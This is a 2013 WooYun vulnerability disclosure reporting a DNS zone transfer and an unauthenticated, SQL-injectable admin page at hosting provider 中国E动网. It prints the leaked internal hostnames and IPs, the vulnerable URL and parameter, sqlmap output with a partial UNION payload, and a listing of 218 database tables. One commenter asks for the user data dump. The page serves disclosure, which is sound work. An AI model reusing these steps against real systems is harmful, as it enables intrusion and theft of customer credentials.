当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-046336

漏洞标题:中国E动网#20多万用户惨遭脱裤风险

相关厂商:中国E动网

漏洞作者: jaojan

提交时间:2013-12-19 11:29

修复时间:2013-12-24 11:30

公开时间:2013-12-24 11:30

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-12-19: 细节已通知厂商并且等待厂商处理中
2013-12-24: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

中国E动网sql惨遭脱裤风险

详细说明:

1#E动网DNS服务器ns1.edong.com 存在域传送漏洞遍历所有分站地址以及IP
> ls edong.com
[ns1.edong.com]
edong.com. NS server = ns.edong.com
edong.com. NS server = ns1.edong.com
edong.com. A 61.147.77.32
dns-ad A 58.215.76.192
dns1 A 203.191.144.134
dns2 A 203.191.144.135
download A 203.191.149.20
dz A 58.215.64.140
eidc A 222.191.251.252
eps A 58.215.76.200
eps1 A 58.215.76.200
exshop A 222.191.251.118
fedora A 61.152.95.158
forum A 58.215.64.130
frsky A 221.130.185.66
gnu A 61.152.93.136
gw1 A 203.191.144.136
gw2 A 203.191.144.137
gw3 A 222.73.163.89
hanxiao A 222.191.251.118
hellokitty A 222.191.251.33
hichina A 112.126.127.21
hotsales A 221.130.185.207
hspc A 203.191.144.133
hxsxw A 58.215.64.137
hzcname NS server = sxns2.edong.com
hzcname NS server = sxns3.edong.com
isbj A 114.111.160.180
iscsi A 222.73.173.125
lin A 58.215.64.158
lingyun A 222.73.57.90
m A 222.73.163.81
mail A 58.215.76.200
205.mail A 203.191.145.15
206.mail A 203.191.145.16
hk.mail A 202.67.215.55
mail1 A 58.215.64.159
mail2 A 58.215.64.170
mail3 A 203.191.145.15
mail4 A 203.191.145.16
mail5 A 222.191.251.36
Mail6 A 58.215.76.168
mail7 A 222.191.251.46
mailtest A 222.191.251.46
mail.mailtest A 222.191.251.46
maven A 58.215.76.178
modernbill A 222.73.163.83
money A 58.215.76.200
monitor A 58.215.76.179
remote.monitor A 61.147.97.189
update.monitor A 58.215.76.178
mydomain A 61.147.67.36
naka A 222.191.251.7
netman A 58.215.76.197
nettest A 203.191.145.51
new A 61.147.67.36
newbars A 221.130.185.208
newsletter NS server = ns.edong.com
newsletter NS server = ns1.edong.com
niki A 222.73.57.90
nor A 203.191.146.253
notice A 222.191.251.33
........................
找到一个存在缺陷的分站
http://eps.edong.com 58.215.76.200
2#后台存在可以绕过直接点击 回扣管理,不用登陆, 切存在sql注射
http://eps.edong.com/admin/kickback/custdetail.php?member_id=21853
<mg src="https://wooyun-img.oss-cn-beijing.aliyuncs.com/upload/201312/181140599425219fbd568f10aaa60060277891a0.jpg" alt="QQ图片20131218113929.jpg" />
加个引号试试,明显的猪肉点

QQ截图20131218114308.jpg


3#丢进sqlmap里跑吧,2个库

QQ图片20131218120150.jpg


primadb,这尼玛就是主站数据裤子!!!

QQ图片20131218114703.jpg


好多表,各种VPS,域名,主机用户密码,密码是MD5
Place: GET
Parameter: member_id
Type: UNION query
Title: MySQL UNION query (NUL
Payload: member_id=21853 UNIO
,0x52444c64484652565a62,0x7173717
LL,NULL,NULL,NULL,NULL,NULL,NULL,
LL,NULL,NULL,NULL,NULL,NULL,NULL,
LL,NULL,NULL,NULL,NULL#
---
[11:51:41] [INFO] the back-end DB
web server operating system: Linu
web application technology: Apach
back-end DBMS: MySQL 5
[11:51:41] [INFO] fetching tables
[11:51:41] [INFO] the SQL query u
Database: primadb
[218 tables]
+------------------------------+
| 251_56 |
| EIMS_CityID |
| EIMS_Plesk |
| EIMS_USER |
| EIMS_boice |
| EIMS_tabEDICP |
| EIMS_tabEDICPLOGs |
| EIMS_tabEDICPs |
| EIMS_tabEmailInstance |
| EIMS_tabFAQs |
| EIMS_tabICPCounts |
| EIMS_tabICPNoLimit |
| EIMS_tabICPNotifyPass |
| EIMS_tabICPNotifyReject |
| EIMS_tabICPRecords |
| EIMS_tabICPs |
| EIMS_tabICPsOp |
| EIMS_tabICPsOpImport |
| EIMS_tabIDC |
| EIMS_tabIDCPosts |
| EIMS_tabIDCThread |
| EIMS_tabPoliceBeian |
| EIMS_tabPosts |
| EIMS_tabRack |
| EIMS_tabReportCache |
| EIMS_tabThread |
| EIMS_tabVPInvites |
| Fina |
| beian |
| beianip |
| eims_domain |
| epsemail |
| exportXXXX |
| ids |
| jiangyin |
| log_DeleteDomain_Auto |
| mail2 |
| mail_close |
| mailsite |
| mailuser |
| tabACAs |
| tabAccessLogs |
| tabAttachments |
| tabAuditAliases |
| tabAuditLogs |
| tabAuditSettings |
| tabBGTasks |
| tabBeijingIDCDomains |
| tabBizCNCNDomains |
| tabBizCNIntlDomains |
| tabBizLogins |
| tabCNNICDomains |
| tabCartComponents |
| tabCartParameters |
| tabColocations |
| tabContacts |
| tabCustomInstances |
| tabCustomSpecs |
| tabCustomers |
| tabDNSComCNDomains |
| tabDNSZoneInstances |
| tabDataCenters |
| tabDedicatedServers |
| tabDeviceCategories |
| tabDeviceOfflineRecords |
| tabDeviceOnlineRecords |
| tabDeviceProperties |
| tabDevices |
| tabDiscounts |
| tabDomainDefaults |
| tabDomainNameServers |
| tabDomainQueues |
| tabDomainSpecs |
| tabDomainTransferIns |
| tabDomainTransferOuts |
| tabDomains |
| tabEmailProviders |
| tabEmailboxInstances |
| tabExtAppInstParas |
| tabExtAppInstances |
| tabExtAppParameters |
| tabExtAppServers |
| tabExtApplications |
| tabFGBindings |
| tabFGInstances |
| tabFGValues |
| tabFGroups |
| tabFOptions |
| tabFTPAccountInstances |
| tabFields |
| tabForbiddenDomains |
| tabForgetPassRequests |
| tabFunctionLimits |
| tabFunctions |
| tabGroups |
| tabHelpMessages |
| tabHelpMessages_bak1 |
| tabHichinaDomains |
| tabHichinaDomains2 |
| tabHistoryDomains |
| tabICPRecords |
| tabINWWDomains |
| tabIPAddresses |
| tabIPAliases |
| tabIPPools |
| tabLinks |
| tabLocations |
| tabLogicalServers |
| tabLoginGroups |
| tabLoginSessions |
| tabLogins |
| tabMSSQLDBInstances |
| tabMailQueue |
| tabMemberAccounts |
| tabMemberLevels |
| tabMemberRegisterRequests |
| tabMemberSalesStates |
| tabMembers |
| tabMoveIPs |
| tabMySQLDBInstances |
| tabNews |
| tabNotices |
| tabOSTypes |
| tabOnlineTransactions |
| tabOperations |
| tabOrderComponents |
| tabOrderItems |
| tabOrderParameters |
| tabOrderProcessLogs |
| tabOrganizations |
| tabPHSoftAppLicenses |
| tabPHSoftCerts |
| tabPHSoftCtrlLicenses |
| tabPSessions |
| tabPaycenterDomains |
| tabPhysicalServers |
| tabPlanLocationMaps |
| tabPlanServerMaps |
| tabPlans |
| tabPortLinks |
| tabPorts |
| tabPrivileges |
| tabProductClassOptions |
| tabProductClasses |
| tabProductOptionalItems |
| tabProductOptions |
| tabProductPackageComponents |
| tabProductPackagePrices |
| tabProductPackages |
| tabProductParaSample |
| tabProductPrices |
| tabProductSiteAddonPrices |
| tabProducts |
| tabProductsNew |
| tabProfiles |
| tabPromotions |
| tabPublicDomains |
| tabRacks |
| tabRestrictedDomains |
| tabReverseDNSZones |
| tabRoles |
| tabRooms |
| tabScopes |
| tabSecurityLogs |
| tabServerShutdownDelay |
| tabServerShutdownTask |
| tabServiceRenew |
| tabServiceServerPolicies |
| tabShoppingCartItems |
| tabSiteAddonSpecs |
| tabSiteAddons |
| tabSiteProperties |
| tabSiteTransfers |
| tabSites |
| tabSpaceInstances |
| tabSubSites |
| tabSupportProcessLogs |
| tabSupportTicketDialogs |
| tabSupportTickets |
| tabSysConfigs |
| tabTransactions |
| tabUserSessions |
| tabVLans |
| tabVPAccounts |
| tabVPOrderItems |
| tabVPProductOptionalItems |
| tabVPProducts |
| tabVPResellerLevels |
| tabVPResellerPrices |
| tabVPResellers |
| tabVPSFunctionLimits |
| tabVPSInstances |
| tabVPSProperties |
| tabVPSQueues |
| tabVPSSpecs |
| tabVPServiceRenew |
| tabVPServices |
| tabVPTasks |
| tabVPTransactions |
| tabVZIPPools |
| tabVZNodeOSTs |
| tabVZNodes |
| tabVZOSTemplates |
| tabVZOSTs |
| tabVZSpecNodeMaps |
| tabVerifyCodes |
| tabVirtualHostingCustomerMap |
| tabVirtualHostings |
| tabWebBindings |
| tabWebSiteContents |
| tabWebSiteInstances |
| tabWebccDomains |
| tabWebossInstances |
| tabdomainqueues |
| temp |
| tmp |
| tmpUserInfo |
| tmp_domain |
+------------------------------+

漏洞证明:

4#威胁到E动网所有用户~~~各种vps,域名,主机用户,20多万,粗粗的看了,下密码是MD5(unix加密的)

QQ图片20131218115038.jpg


最后#未脱裤,仅做测试,切勿跨省查水表!!!!!

修复方案:

....你们专业的.20多万用户各种密码。20rank不多吧

版权声明:转载请注明来源 jaojan@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2013-12-24 11:30

厂商回复:

最新状态:

暂无


漏洞评价:

评论

  1. 2013-12-24 11:34 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)

    我去!VPS?好啊

  2. 2013-12-24 11:35 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)

    忽略+修复

  3. 2013-12-24 12:41 | flywin ( 路人 | Rank:9 漏洞数:1 | 有好的安卓或者IOS远程控制的请联系我,RMB...)

    丢个裤子

  4. 2013-12-24 16:58 | jaojan ( 路人 | Rank:21 漏洞数:10 | xss my life)

    @wefgod 我日,偷偷的修复了,然后忽略了,尼玛,这种厂商

  5. 2013-12-24 17:39 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)

    @jaojan 悲剧

  6. 2014-01-13 22:22 | unshell ( 实习白帽子 | Rank:35 漏洞数:16 )

    中国E动网 不应该这么偷偷的修复吧!

  7. 2014-01-13 23:19 | jaojan ( 路人 | Rank:21 漏洞数:10 | xss my life)

    @unshell 忽略+修复。垃圾厂商